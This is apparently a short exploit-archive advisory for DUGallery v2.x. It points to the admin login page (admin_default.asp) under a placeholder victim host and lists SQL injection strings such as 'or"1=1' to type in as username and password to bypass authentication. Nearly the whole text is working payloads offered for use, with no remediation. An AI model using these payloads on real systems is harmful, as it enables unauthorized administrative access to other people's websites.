DUGallery v2.x suffers from a login bypass vulnerability.
0ff16a405aef77db1af7f8a80371f0fb25208dfe596e31915efd8f8266351d65
# Milli-Harekat Advisory ( www.milli-harekat.org )
# DUGaleri Admin SQL Injection
# Risk : High
# Script : DUGallery v2.x
# Credits : Dj ReMix
# Thanks : ßy Korsan , ESKOBAR , Poizonb0x , TR_IP , SariKamis
DuGallery Admin Page's www.victim.com/[DuGallery Path ]/admin_default.asp
Login and password :
'or'
'or"1=1'
'or"='
Bye !